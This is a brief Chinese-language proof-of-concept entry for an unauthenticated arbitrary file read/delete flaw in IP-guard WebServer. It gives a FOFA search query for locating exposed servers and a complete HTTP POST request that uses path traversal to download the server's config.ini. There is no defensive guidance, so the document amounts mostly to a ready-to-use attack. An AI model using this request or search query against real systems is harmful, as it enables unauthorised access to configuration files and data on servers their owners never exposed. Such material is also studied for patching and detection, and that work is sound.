0x01 产品简介
IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分,用于提供 Web 界面以进行用户权限管理、监控和审计。
0x02 漏洞概述
IP-guard WebServer的权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。
0x03 测绘语句
fofa: icon_hash="2030860561"
0x04 漏洞复现
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
0x05 影响范围
IP-guard Web